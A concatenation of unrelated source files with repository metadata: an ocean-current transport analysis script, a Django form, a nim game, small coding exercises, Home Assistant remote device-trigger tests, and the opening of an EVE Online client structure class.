4677fbdc2a00050d77fd0d794bb57194c2f5ee75 | e8e4bb89c6ce57c038de445091ddebc1c1b6eb26 | /oldscripts/Transport_permoor_newer.py | 7b4c40d98f9b1bbd636b05bd970899b248439250 | [] | no_license | ilebras/OSNAP | dc7fba846f866ec64edab35a278d2ce6c86e5f97 | a5b22026351d2eb8dc4c89e2949be97122936d23 | refs/heads/master | 2021-05-12T16:46:18.955345 | 2020-09-08T23:04:23 | 2020-09-08T23:04:23 | 117,025,921 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,958 | py | #################################################################################
#################################################################################
#################################################################################
######################## CALCULATE TRANSPORT ###################################
#################################################################################
#################################################################################
#################################################################################
from aux_funcs import *
daily=pickle.load(open('../pickles/CF_xarray_notid.pickle','rb'))
#################################################################################
# Have a quick look at CF1 evolution in time
#################################################################################
def plotmoortime(moornum):
figure(figsize=(12,3))
ax=contourf(daily.date.data,daily.depth,daily['across track velocity'][moornum-1,:,:],cmap=cm.RdBu_r,vmin=-1.25,vmax=1.25)
colorbar(ticks=[-1.5,-1,-0.5,0,0.5])
contour(daily.date.data,daily.depth,daily['across track velocity'][moornum-1,:,:],[-0.75],colors='k')
ylim([170,0])
ylabel('depth (m)')
xlabel('date')
title('CF'+str(moornum)+' across track velocity')
savefig('../figures/hovmueller/cf'+str(moornum)+'_vel.png',bbox_inches='tight')
savefig('../figures/hovmueller/cf'+str(moornum)+'_vel.pdf',bbox_inches='tight')
for rr in range(1,9):
plotmoortime(rr)
#################################################################################
#################################################################################
############# Get EGCC and EGC transports ####################################
#################################################################################
#################################################################################
#################################################################################
# Quick code for looking at monthly averages
#################################################################################
def monthplot(afield):
figure()
afield.resample('M',dim='date',how='mean')[:12,:,:].plot(x='distance', y='depth', col='date', col_wrap=4)
monthplot(daily['across track velocity'])
ylim([1000,0])
#################################################################################
################ Find and examine isohalines ###################################
#################################################################################
#
# def find_isohaline(which):
#
# maxdepth=pd.DataFrame(index=daily.date, columns=daily.distance)
#
# for j, m in enumerate(daily.distance):
# for i, d in enumerate(daily.date):
# thissal=daily.salinity[j,:,i]
# nanind=~isnan(thissal)
# if sum(nanind)==0:
# maxdepth.iloc[i,j]=nan
# elif sum((thissal[nanind]>which))==0:
# maxdepth.iloc[i,j]=max(daily.depth[nanind])
# else:
# maxdepth.iloc[i,j]=float(daily.depth[nanind][(thissal[nanind]>which)].min())
#
# maxdepth=maxdepth.astype('float')
# return maxdepth
#
#
# max34depth=find_isohaline(34)
# max348depth=find_isohaline(34.8)
#
# colors=pal.cubehelix.perceptual_rainbow_16.get_mpl_colormap()
#
# fig, ax = plt.subplots(1)
# fig.set_size_inches(12,4)
# max34depth.plot(ax=ax, cmap=colors, alpha=0.5,label=False)
# g=max34depth.resample('M',closed='right').mean().plot(ax=ax, cmap=colors, alpha=1, lw=2)
# legend(loc=(1.05,0))
# gca().invert_yaxis()
# title('Depth of 34 isohaline along CF array')
# savefig('../figures/isohalines/34tseries.png')
#
# fig, ax = plt.subplots(1)
# fig.set_size_inches(12,4)
# max348depth.plot(ax=ax, cmap=colors, alpha=0.5,label=False)
# num=max348depth.resample('M').mean().plot(ax=ax, cmap=colors, alpha=1, lw=2)
# num.legend(loc=(1.05,0))
# gca().invert_yaxis()
# title('Depth of 34.8 isohaline along CF array')
# savefig('../figures/isohalines/348tseries.png')
#
# fig, ax = plt.subplots(1)
# fig.set_size_inches(12,4)
# num=max34depth.resample('M').mean().plot(ax=ax, cmap=colors, alpha=1, lw=2,linestyle='--')
# max348depth.resample('M').mean().plot(ax=ax, cmap=colors, alpha=1, lw=2)
# num.legend(loc=(1.05,0))
# title('Depths of 34 and 34.8 isohalines along CF array')
# gca().invert_yaxis()
# savefig('../figures/isohalines/34and348tseries.png')
#################################################################################
### Look at velocity magnitudes at different moorings
#################################################################################
figure(figsize=(14,3))
for rr in range(3):
plot(daily.date,daily['across track velocity'].min(dim='depth')[rr],alpha=0.5,label='CF'+str(rr+1))
plot(daily.resample('M',dim='date',how='mean').date,daily['across track velocity'].resample('M',dim='date',how='mean').min(dim='depth')[rr])
legend(loc=(1.05,0))
plot(daily.date,0.15*daily['across track velocity'].min(dim='depth')[0],'k')
savefig('../figures/minvels/CF1-2.png')
figure(figsize=(14,3))
for rr in range(1,3):
plot(daily.date,daily['across track velocity'].min(dim='depth')[rr],alpha=0.75,label='CF'+str(rr+1))
# plot(daily.resample('M',dim='date',how='mean').date,daily['across track velocity'].resample('M',dim='date',how='mean').min(dim='depth')[rr])
legend(loc=(1.05,0.2))
title('CF2 and 3 track each other closely')
savefig('../figures/minvels/CF2-3.png')
for rr in range(8):
figure(figsize=(14,3))
# plot(daily.date,daily['across track velocity'].min(dim='depth')[rr],alpha=0.5,label='CF'+str(rr+1))
plot(daily.resample('M',dim='date',how='mean').date,daily['across track velocity'].resample('M',dim='date',how='mean').min(dim='depth')[rr],label='min vel')
title('CF'+str(rr+1))
plot(daily.resample('M',dim='date',how='mean').date,daily['across track velocity'].resample('M',dim='date',how='mean')[rr,0,:],label='surface vel')
legend(loc=(1.05,0.2))
ylabel('velocity (m/s)')
savefig('../figures/velstats/CF'+str(rr+1)+'_minvelcomp_monthly.png',bbox_inches='tight')
for rr in range(8):
figure(figsize=(14,3))
plot(daily.date,daily['across track velocity'].min(dim='depth')[rr],label='min vel')
axhline(0)
title('CF'+str(rr+1))
plot(daily.date,daily['across track velocity'][rr,0,:],label='surface vel')
legend(loc=(1.05,0.2))
ylabel('velocity (m/s)')
savefig('../figures/velstats/CF'+str(rr+1)+'_minvelcomp_daily.png',bbox_inches='tight')
daily.dims
figure(figsize=(14,3))
for rr in range(8):
plot(daily.resample('M',dim='date',how='mean').date,daily['across track velocity'].resample('M',dim='date',how='mean')[rr,0,:],label='CF'+str(rr+1))
legend(loc=(1.05,0.2))
savefig('../figures/velstats/Monthlyave_surf_all.png')
#################################################################################
# Transport -- define as solely at CF1 for now
#################################################################################
mid_dist=hstack((12,(diff(daily.distance)[:-1]+diff(daily.distance)[1:])/2,17))
middistmat=transpose((tile(mid_dist,[len(daily.depth)-1,len(daily.date),1])),(2,0,1))
depthdiffmat=transpose((tile(diff(daily.depth),[len(daily.distance),len(daily.date),1])),(0,2,1))
shape(middistmat[:,:,:])
cf1vel=daily['across track velocity'][0,:-1,:]
cctrans=(cf1vel*depthdiffmat[0,:,:]*middistmat[0,:,:]/1e3).sum('depth')
cctrans_sal=(daily.where(daily.salinity<34)['across track velocity'][0,:-1,:]*depthdiffmat[0,:,:]*middistmat[0,:,:]/1e3).sum('depth')
cctrans.plot(figsize=(12,3),label='Full CF1 water column')
axhline(0)
cctrans.resample('M',how='mean',dim='date').plot(linewidth=2,label='',)
cctrans_sal.plot(label='Fresher than 34 at CF1')
legend()
ylabel('Transport (Sv)')
title('Transport at CF1 (EGCC)')
savefig('../figures/trans/CF1trans.png')
cctrans_scaled=cctrans*3
cctrans.plot(figsize=(12,3),label='')
axhline(0)
cctrans.resample('M',how='mean',dim='date').plot(linewidth=2,label='',)
# cctrans_sal.plot(label='Fresher than 34 at CF1')
legend()
ylabel('[Sv]')
title('EG Coastal Current transport')
savefig('../figures/trans/EGCC_trans.pdf')
cctrans.resample('W',how='mean',dim='date').plot(figsize=(12,3))
EGtottrans=(daily['across track velocity'][1:,:-1,:]*depthdiffmat[1:,:,:]*middistmat[1:,:,:]/1e3).sum('distance').sum('depth')
EGtottrans_vel=(daily.where(daily['across track velocity']<0)['across track velocity'][1:,:-1,:]*depthdiffmat[1:,:,:]*middistmat[1:,:,:]/1e3).sum('distance').sum('depth')
EGtottrans.plot(figsize=(12,3),label='Full water columns')
# axhline(0)
EGtottrans.resample('M',how='mean',dim='date').plot(linewidth=2,label='',)
EGtottrans_vel.plot(label='Only negative velocities')
ylabel('Transport (Sv)')
legend()
title('Transport at CF2-M1 (EGC system)')
savefig('../figures/trans/CF2-8trans.png')
egtrans=(daily.where(daily.salinity<34.8)['across track velocity'][1:,:-1,:]*depthdiffmat[1:,:,:]*middistmat[1:,:,:]/1e3).sum('distance').sum('depth')
ictrans=(daily.where(daily.salinity>=34.85)['across track velocity'][1:,:-1,:]*depthdiffmat[1:,:,:]*middistmat[1:,:,:]/1e3).sum('distance').sum('depth')
cctrans.plot(figsize=(12,3),label='East Greenland COASTAL Current')
egtrans.plot(label='East Greenlandic Current Waters')
# axhline(0)
# egtrans.resample('M',how='mean',dim='date').plot(linewidth=2,label='',)
ictrans.plot(label='Irminger Current')
ylabel('Transport (Sv)')
legend()
title('EGC system transports')
savefig('../figures/trans/EGsystem_trans.png')
egtrans.plot(figsize=(12,3),label='East Greenlandic Current Waters')
axhline(0)
egtrans.resample('M',how='mean',dim='date').plot(linewidth=2)
ylabel('[Sv]')
title('East Greenlandic Current transport')
savefig('../figures/trans/EGC_trans.png')
savefig('../figures/trans/EGC_trans.pdf')
figure()
egtrans.plot(figsize=(12,3),alpha=0.5,label='')
egtrans.resample('M',dim='date',how='mean').plot(linewidth=2,color='b',label='East Greenland Current')
cctrans_scaled.plot(alpha=0.5,label='')
cctrans_scaled.resample('M',dim='date',how='mean').plot(linewidth=2,color='orange',label='Coastal Current (x 3)')
title('Transport in the EGC system')
ylabel('[Sv]')
legend()
savefig('../figures/trans/EGCboth_trans.png')
savefig('../figures/trans/EGCboth_trans.pdf',bbox_inches='tight')
ictrans.plot(figsize=(12,3))
ictrans.resample('M',how='mean',dim='date').plot(linewidth=2)
ylabel('Transport (Sv)')
title('Irminger Current transport')
savefig('../figures/trans/IC_trans.png')
hexbin(daily.salinity.values.flatten(),daily.temperature.values.flatten(),bins='log',cmap=cm.hot_r)
axvline(34.8,color='k')
colorbar(label='[log of number of measurements]')
ylabel('potential temperature [$^\circ$ C]')
xlabel('salinity')
title('Separation of Polar and Atlantic Water at 34.8')
savefig('../figures/trans/TS_separation.png')
savefig('../figures/trans/TS_separation.pdf',bbox_inches='tight')
#################################################################################
###################### Freshwater transport #####################################
#################################################################################
srefa=34
srefb=34.8
ccfresh=(cf1vel*(daily.salinity[0,:-1,:]-srefa)/srefa*depthdiffmat[0,:,:]*middistmat[0,:,:]).sum('depth')
ccfresh_refb=(cf1vel*(daily.salinity[0,:-1,:]-srefb)/srefb*depthdiffmat[0,:,:]*middistmat[0,:,:]).sum('depth')
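# Note on units (same assumptions as above): v*(S-sref)/sref*dz*dx with dx
# in km sums to multiples of 1e3 m^3/s, i.e. mSv, so no extra scaling is
# applied to the freshwater fluxes.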
ccfresh_scaled=ccfresh*2
figure()
ccfresh.plot(figsize=(12,3),color='orange')
ccfresh.resample('M',dim='date',how='mean').plot(linewidth=2,color='orange')
title('Freshwater transport in the EGCC referenced to 34')
ylabel('mSv')
savefig('../figures/trans/CC_fresh.png')
figure()
ccfresh_refb.plot(figsize=(12,3),color='orange')
ccfresh_refb.resample('M',dim='date',how='mean').plot(linewidth=2,color='orange')
title('Freshwater transport in the EGCC referenced to 34.8')
ylabel('mSv')
savefig('../figures/trans/CC_fresh_refb.png')
egfresh=(daily.where(daily.salinity<34.85)['across track velocity'][1:,:-1,:]*(daily.where(daily.salinity<34.85)['salinity'][1:,:-1,:]-srefb)/srefb*depthdiffmat[1:,:,:]*middistmat[1:,:,:]).sum('distance').sum('depth')
figure()
egfresh.plot(figsize=(12,3))
egfresh.resample('M',dim='date',how='mean').plot(linewidth=2,color='b')
title('Freshwater transport in the EGC')
ylabel('mSv')
savefig('../figures/trans/EGC_fresh.png')
figure()
egfresh.plot(figsize=(12,3),alpha=0.5)
egfresh.resample('M',dim='date',how='mean').plot(linewidth=2,color='b',label='East Greenland Current')
ccfresh_scaled.plot(alpha=0.5)
ccfresh_scaled.resample('M',dim='date',how='mean').plot(linewidth=2,color='orange',label='Coastal Current (x 2)')
title('Freshwater transport in the EGC system')
ylabel('mSv')
legend()
savefig('../figures/trans/EGCboth_fresh.png')
savefig('../figures/trans/EGCboth_fresh.pdf',bbox_inches='tight')
icfresh=(daily.where(daily.salinity>=34.85)['across track velocity'][1:,:-1,:]*(daily.where(daily.salinity>=34.85)['salinity'][1:,:-1,:]-srefb)/srefb*depthdiffmat[1:,:,:]*middistmat[1:,:,:]/1e3).sum('distance').sum('depth')
icfresh.plot(figsize=(12,3))
icfresh.resample('M',dim='date',how='mean').plot(linewidth=2,color='b')
title('Freshwater transport in the IC')
ylabel('mSv')
| [
"[email protected]"
] | |
e10a899ea0e195ad55ab677dbc9616a9e3f64832 | f72fa4432e6abb742cbf1c61c580db1ed688a311 | /day27/s21crm/crm/forms/school.py | c8e42b166247fd56e11cee8ef0a4b0e7def14cb2 | [] | no_license | huningfei/python | 7ddc9da14a3e53ad1c98fc48edd1697a6f8fc4f7 | 9ca1f57f2ef5d77e3bb52d70ac9a241b8cde54d2 | refs/heads/master | 2022-10-31T18:56:33.894302 | 2019-01-04T11:06:59 | 2019-01-04T11:06:59 | 128,178,516 | 2 | 1 | null | 2022-10-12T19:26:04 | 2018-04-05T08:25:32 | Python | UTF-8 | Python | false | false | 401 | py | from django import forms
from crm import models
class SchoolModelForm(forms.ModelForm):
class Meta:
        model = models.School  # note: the attribute must be "model" (singular), not "models"
fields = '__all__'
error_messages = {
'title': {'required': '学校不能为空'}
}
widgets = {
'title': forms.TextInput(attrs={'class': 'form-control'})
}
| [
"[email protected]"
] | |
909457621a61debda7558bb9f60c2c7feb57b2d0 | 76a402b7db1432f9bf8b9605416521a4284ce1e2 | /nim_game.py | 95d3be8cab232b6f99b6eef35ff32fa60baa5ddf | [] | no_license | SuguruChhaya/nim-game | 7aa915a475d414288fbb33957cad88ec4dac0c1d | 6f345a36dc3a26ee8e5f89c139718a21b7050232 | refs/heads/master | 2022-12-13T01:30:04.352715 | 2020-09-22T23:42:51 | 2020-09-22T23:42:51 | 285,307,692 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,498 | py | import random
'''
Holds the game state and turn-taking logic; one instance runs one game.
'''
class MainGame():
def __init__(self, reaching_number, increment, goesfirst):
self.reaching_number = reaching_number
self.increment = increment
self.goesfirst = goesfirst
#*Keeps track of the previous numbers
self.total = 0
self.current_choice = 0
#*Finding the reaching_number - 1 number
self.ending_win_number = self.reaching_number - 1
self.follow_increment = self.increment + 1
#*Rather than making the move based on the past move, I should try to get it close to the win_number_list
self.win_number_list = []
for i in range(self.ending_win_number, 0, -1 * self.follow_increment):
self.win_number_list.append(i)
self.win_number_list = sorted(self.win_number_list)
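        # Strategy note (assumption): with max increment k, any total
        # congruent to reaching_number - 1 modulo (k + 1) is a winning
        # target; e.g. reaching_number=21, increment=3 gives
        # win_number_list == [4, 8, 12, 16, 20].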
def gotoplayerturn(self):
if self.goesfirst == '0':
self.no_input_character()
elif self.goesfirst == '1':
self.input_character()
def no_input_character(self):
        #*This function is for the characters without inputs (the computer)
print("\nThe computer's turn")
print(f"\nCurrent total: {self.total}")
if self.total not in self.win_number_list:
for i in self.win_number_list:
if i > self.total and i - self.total <= self.increment:
self.current_choice = i - self.total
print(f"The computer chooses: {self.current_choice}\n")
self.total += self.current_choice
#*Just in case the player knows the strategy and there is no hope to win,
#*I will pick a random int
elif self.total in self.win_number_list:
self.current_choice = random.randint(1, self.increment)
print(f"The computer chooses: {self.current_choice}\n")
self.total += self.current_choice
if self.total >= self.reaching_number:
print(f"The computer reached {self.reaching_number}.")
print("The computer loses.")
else:
self.input_character()
def input_character(self):
#*This function is for the characters with inputs (you, your friend)
not_valid = True
while not_valid:
print('\nYour turn:')
print(f"\nCurrent total: {self.total}")
print(f"Pick the increment (max:{self.increment})")
self.current_choice = input("You choose: ")
try:
self.current_choice = int(self.current_choice)
if not 1 <= self.current_choice <= self.increment:
raise(ValueError)
else:
self.total += self.current_choice
not_valid = False
if self.total >= self.reaching_number:
print(f"You reached {self.reaching_number}.")
print("You lose.")
else:
self.no_input_character()
except ValueError:
print("Enter valid command or integer.")
not_valid = True
print("\nWelcome to the nim game! \nYou will count from 1 to the reaching number. \nYou will choose the max increment and the reaching number.\nSince the computer will perform the best possible moves to win, you can use this program to beat your friends!")
not_valid = True
while not_valid:
try:
print("\nThe reaching number has to be between 20 and 100 (inclusive).")
reaching_number_str = input("Enter reaching number: ")
print("\nThe max increment has to be between 3 and 10 (inclusive).")
incement_str = input("Enter max increment: ")
reaching_number = int(reaching_number_str)
increment = int(incement_str)
not_valid = False
if (not 20 <= reaching_number <= 100) or (not 3 <= increment <= 10):
raise(ValueError)
else:
zero_player = "The computer"
one_player = "You"
goesfirst = input(f"Who goes first: 0({zero_player}) or 1({one_player})>")
if goesfirst in ['0', '1']:
game = MainGame(reaching_number, increment, goesfirst)
game.gotoplayerturn()
else:
raise (ValueError)
except ValueError:
print("Enter a valid command or integer.")
not_valid = True
| [
"[email protected]"
] | |
6759479a9640fc8ea7ba928109da4abbb456fb4a | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/25/usersdata/112/12124/submittedfiles/av1_3.py | 0b936ae903da1273501fd3e5f09c85bf73708585 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 219 | py | # -*- coding: utf-8 -*-
from __future__ import division
import math
a = input('Enter the value of a: ')
b = input('Enter the value of b: ')
# Assumption: the intended computation is gcd(a, b) via Euclid's algorithm.
while b != 0:
    a, b = b, a % b
print(a)
"[email protected]"
] | |
36eef88f9be11b834b7c966f8e0e37c3e0e6c41b | 8388d0ed8ad412c47d47dd9da8f05e35f7e2644c | /accepted/48-rotate-image.py | 7a18dd7fa4f48ec671c91742020ac5e4795f1851 | [] | no_license | luodichen/leetcode-solution | d4cd5abbb0f5cf640035b563ed566c706d4fcbed | 74c2f9e0e60e64c84be6db9b0511db037d12b109 | refs/heads/master | 2020-05-16T16:45:42.056541 | 2015-11-16T05:41:59 | 2015-11-16T05:41:59 | 39,545,259 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 606 | py | # https://leetcode.com/problems/rotate-image/
class Solution:
# @param {integer[][]} matrix
# @return {void} Do not return anything, modify matrix in-place instead.
def rotate(self, matrix):
if 0 == len(matrix):
return list()
result = []
col_len = len(matrix[0])
for i in xrange(col_len):
result_row = []
for row in matrix[::-1]:
result_row.append(row[i])
result.append(result_row)
del matrix[:]
for row in result:
matrix.append(row)
| [
"[email protected]"
] | |
01ef88728bf02ea3ad9fac6b0c5c4f64a492c30a | 96dcea595e7c16cec07b3f649afd65f3660a0bad | /tests/components/remote/test_device_trigger.py | b5dcca3dc4c9f2fe772eca66fdec608d73ab918b | [
"Apache-2.0"
] | permissive | home-assistant/core | 3455eac2e9d925c92d30178643b1aaccf3a6484f | 80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743 | refs/heads/dev | 2023-08-31T15:41:06.299469 | 2023-08-31T14:50:53 | 2023-08-31T14:50:53 | 12,888,993 | 35,501 | 20,617 | Apache-2.0 | 2023-09-14T21:50:15 | 2013-09-17T07:29:48 | Python | UTF-8 | Python | false | false | 13,958 | py | """The test for remote device automation."""
from datetime import timedelta
import pytest
from pytest_unordered import unordered
import homeassistant.components.automation as automation
from homeassistant.components.device_automation import DeviceAutomationType
from homeassistant.components.remote import DOMAIN
from homeassistant.const import STATE_OFF, STATE_ON, EntityCategory
from homeassistant.core import HomeAssistant
from homeassistant.helpers import device_registry as dr, entity_registry as er
from homeassistant.helpers.entity_registry import RegistryEntryHider
from homeassistant.setup import async_setup_component
import homeassistant.util.dt as dt_util
from tests.common import (
MockConfigEntry,
async_fire_time_changed,
async_get_device_automation_capabilities,
async_get_device_automations,
async_mock_service,
)
@pytest.fixture(autouse=True, name="stub_blueprint_populate")
def stub_blueprint_populate_autouse(stub_blueprint_populate: None) -> None:
"""Stub copying the blueprints to the config folder."""
@pytest.fixture
def calls(hass):
"""Track calls to a mock service."""
return async_mock_service(hass, "test", "automation")
async def test_get_triggers(
hass: HomeAssistant,
device_registry: dr.DeviceRegistry,
entity_registry: er.EntityRegistry,
) -> None:
"""Test we get the expected triggers from a remote."""
config_entry = MockConfigEntry(domain="test", data={})
config_entry.add_to_hass(hass)
device_entry = device_registry.async_get_or_create(
config_entry_id=config_entry.entry_id,
connections={(dr.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
)
entity_entry = entity_registry.async_get_or_create(
DOMAIN, "test", "5678", device_id=device_entry.id
)
expected_triggers = [
{
"platform": "device",
"domain": DOMAIN,
"type": trigger,
"device_id": device_entry.id,
"entity_id": entity_entry.id,
"metadata": {"secondary": False},
}
for trigger in ["changed_states", "turned_off", "turned_on"]
]
triggers = await async_get_device_automations(
hass, DeviceAutomationType.TRIGGER, device_entry.id
)
assert triggers == unordered(expected_triggers)
@pytest.mark.parametrize(
("hidden_by", "entity_category"),
(
(RegistryEntryHider.INTEGRATION, None),
(RegistryEntryHider.USER, None),
(None, EntityCategory.CONFIG),
(None, EntityCategory.DIAGNOSTIC),
),
)
async def test_get_triggers_hidden_auxiliary(
hass: HomeAssistant,
device_registry: dr.DeviceRegistry,
entity_registry: er.EntityRegistry,
hidden_by,
entity_category,
) -> None:
"""Test we get the expected triggers from a hidden or auxiliary entity."""
config_entry = MockConfigEntry(domain="test", data={})
config_entry.add_to_hass(hass)
device_entry = device_registry.async_get_or_create(
config_entry_id=config_entry.entry_id,
connections={(dr.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
)
entity_entry = entity_registry.async_get_or_create(
DOMAIN,
"test",
"5678",
device_id=device_entry.id,
entity_category=entity_category,
hidden_by=hidden_by,
)
expected_triggers = [
{
"platform": "device",
"domain": DOMAIN,
"type": trigger,
"device_id": device_entry.id,
"entity_id": entity_entry.id,
"metadata": {"secondary": True},
}
for trigger in ["changed_states", "turned_off", "turned_on"]
]
triggers = await async_get_device_automations(
hass, DeviceAutomationType.TRIGGER, device_entry.id
)
assert triggers == unordered(expected_triggers)
async def test_get_trigger_capabilities(
hass: HomeAssistant,
device_registry: dr.DeviceRegistry,
entity_registry: er.EntityRegistry,
) -> None:
"""Test we get the expected capabilities from a remote trigger."""
config_entry = MockConfigEntry(domain="test", data={})
config_entry.add_to_hass(hass)
device_entry = device_registry.async_get_or_create(
config_entry_id=config_entry.entry_id,
connections={(dr.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
)
entity_registry.async_get_or_create(
DOMAIN, "test", "5678", device_id=device_entry.id
)
expected_capabilities = {
"extra_fields": [
{"name": "for", "optional": True, "type": "positive_time_period_dict"}
]
}
triggers = await async_get_device_automations(
hass, DeviceAutomationType.TRIGGER, device_entry.id
)
for trigger in triggers:
capabilities = await async_get_device_automation_capabilities(
hass, DeviceAutomationType.TRIGGER, trigger
)
assert capabilities == expected_capabilities
async def test_get_trigger_capabilities_legacy(
hass: HomeAssistant,
device_registry: dr.DeviceRegistry,
entity_registry: er.EntityRegistry,
) -> None:
"""Test we get the expected capabilities from a remote trigger."""
config_entry = MockConfigEntry(domain="test", data={})
config_entry.add_to_hass(hass)
device_entry = device_registry.async_get_or_create(
config_entry_id=config_entry.entry_id,
connections={(dr.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
)
entity_registry.async_get_or_create(
DOMAIN, "test", "5678", device_id=device_entry.id
)
expected_capabilities = {
"extra_fields": [
{"name": "for", "optional": True, "type": "positive_time_period_dict"}
]
}
triggers = await async_get_device_automations(
hass, DeviceAutomationType.TRIGGER, device_entry.id
)
for trigger in triggers:
trigger["entity_id"] = entity_registry.async_get(trigger["entity_id"]).entity_id
capabilities = await async_get_device_automation_capabilities(
hass, DeviceAutomationType.TRIGGER, trigger
)
assert capabilities == expected_capabilities
async def test_if_fires_on_state_change(
hass: HomeAssistant,
entity_registry: er.EntityRegistry,
calls,
enable_custom_integrations: None,
) -> None:
"""Test for turn_on and turn_off triggers firing."""
entry = entity_registry.async_get_or_create(DOMAIN, "test", "5678")
hass.states.async_set(entry.entity_id, STATE_ON)
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: [
{
"trigger": {
"platform": "device",
"domain": DOMAIN,
"device_id": "",
"entity_id": entry.id,
"type": "turned_on",
},
"action": {
"service": "test.automation",
"data_template": {
"some": "turn_on {{ trigger.%s }}"
% "}} - {{ trigger.".join(
(
"platform",
"entity_id",
"from_state.state",
"to_state.state",
"for",
)
)
},
},
},
{
"trigger": {
"platform": "device",
"domain": DOMAIN,
"device_id": "",
"entity_id": entry.id,
"type": "turned_off",
},
"action": {
"service": "test.automation",
"data_template": {
"some": "turn_off {{ trigger.%s }}"
% "}} - {{ trigger.".join(
(
"platform",
"entity_id",
"from_state.state",
"to_state.state",
"for",
)
)
},
},
},
{
"trigger": {
"platform": "device",
"domain": DOMAIN,
"device_id": "",
"entity_id": entry.id,
"type": "changed_states",
},
"action": {
"service": "test.automation",
"data_template": {
"some": "turn_on_or_off {{ trigger.%s }}"
% "}} - {{ trigger.".join(
(
"platform",
"entity_id",
"from_state.state",
"to_state.state",
"for",
)
)
},
},
},
]
},
)
assert len(calls) == 0
hass.states.async_set(entry.entity_id, STATE_OFF)
await hass.async_block_till_done()
assert len(calls) == 2
assert {calls[0].data["some"], calls[1].data["some"]} == {
f"turn_off device - {entry.entity_id} - on - off - None",
f"turn_on_or_off device - {entry.entity_id} - on - off - None",
}
hass.states.async_set(entry.entity_id, STATE_ON)
await hass.async_block_till_done()
assert len(calls) == 4
assert {calls[2].data["some"], calls[3].data["some"]} == {
f"turn_on device - {entry.entity_id} - off - on - None",
f"turn_on_or_off device - {entry.entity_id} - off - on - None",
}
async def test_if_fires_on_state_change_legacy(
hass: HomeAssistant,
entity_registry: er.EntityRegistry,
calls,
enable_custom_integrations: None,
) -> None:
"""Test for turn_on and turn_off triggers firing."""
entry = entity_registry.async_get_or_create(DOMAIN, "test", "5678")
hass.states.async_set(entry.entity_id, STATE_ON)
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: [
{
"trigger": {
"platform": "device",
"domain": DOMAIN,
"device_id": "",
"entity_id": entry.entity_id,
"type": "turned_off",
},
"action": {
"service": "test.automation",
"data_template": {
"some": "turn_off {{ trigger.%s }}"
% "}} - {{ trigger.".join(
(
"platform",
"entity_id",
"from_state.state",
"to_state.state",
"for",
)
)
},
},
},
]
},
)
assert len(calls) == 0
hass.states.async_set(entry.entity_id, STATE_OFF)
await hass.async_block_till_done()
assert len(calls) == 1
assert (
calls[0].data["some"]
== f"turn_off device - {entry.entity_id} - on - off - None"
)
async def test_if_fires_on_state_change_with_for(
hass: HomeAssistant,
entity_registry: er.EntityRegistry,
calls,
enable_custom_integrations: None,
) -> None:
"""Test for triggers firing with delay."""
entry = entity_registry.async_get_or_create(DOMAIN, "test", "5678")
hass.states.async_set(entry.entity_id, STATE_ON)
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: [
{
"trigger": {
"platform": "device",
"domain": DOMAIN,
"device_id": "",
"entity_id": entry.id,
"type": "turned_off",
"for": {"seconds": 5},
},
"action": {
"service": "test.automation",
"data_template": {
"some": "turn_off {{ trigger.%s }}"
% "}} - {{ trigger.".join(
(
"platform",
"entity_id",
"from_state.state",
"to_state.state",
"for",
)
)
},
},
}
]
},
)
await hass.async_block_till_done()
assert len(calls) == 0
hass.states.async_set(entry.entity_id, STATE_OFF)
await hass.async_block_till_done()
assert len(calls) == 0
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
await hass.async_block_till_done()
assert (
calls[0].data["some"]
== f"turn_off device - {entry.entity_id} - on - off - 0:00:05"
)
| [
"[email protected]"
] | |
810e8fc904dfdccceb4282cca5aa2a50ec0181a8 | 5864e86954a221d52d4fa83a607c71bacf201c5a | /eve/client/script/environment/spaceObject/structure.py | 88fcfaaef3632e06940848939a4cc0691a53f89d | [] | no_license | connoryang/1v1dec | e9a2303a01e5a26bf14159112b112be81a6560fd | 404f2cebf13b311e754d45206008918881496370 | refs/heads/master | 2021-05-04T02:34:59.627529 | 2016-10-19T08:56:26 | 2016-10-19T08:56:26 | 71,334,417 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,417 | py | #Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\eve\client\script\environment\spaceObject\structure.py
import blue
import uthread
import structures
import evetypes
import logging
from eve.client.script.environment.spaceObject.buildableStructure import BuildableStructure
from eve.client.script.environment.model.turretSet import TurretSet
from evegraphics.explosions.spaceObjectExplosionManager import SpaceObjectExplosionManager
STATE_CONSTRUCT = 'construct'
STATE_VULNERABLE = 'vulnerable'
STATE_INVULNERABLE = 'invulnerable'
STATE_SIEGED = 'sieged'
STATE_DECONSTRUCT = 'deconstruct'
STATES = {structures.STATE_UNKNOWN: STATE_INVULNERABLE,
structures.STATE_UNANCHORED: STATE_DECONSTRUCT,
structures.STATE_ANCHORING: STATE_CONSTRUCT,
structures.STATE_ONLINE: STATE_INVULNERABLE,
structures.STATE_SHIELD_VULNERABLE: STATE_VULNERABLE,
structures.STATE_SHIELD_REINFORCE: STATE_SIEGED,
structures.STATE_ARMOR_VULNERABLE: STATE_VULNERABLE,
structures.STATE_ARMOR_REINFORCE: STATE_SIEGED,
structures.STATE_HULL_VULNERABLE: STATE_VULNERABLE}
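# Descriptive note: collapses the fine-grained server-side structure FSM
# states into the five client animation states defined above.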
class Structure(BuildableStructure):
__unloadable__ = True
def __init__(self):
BuildableStructure.__init__(self)
self.Init()
def Release(self):
BuildableStructure.Release(self)
self.Init()
def Init(self):
self.fitted = False
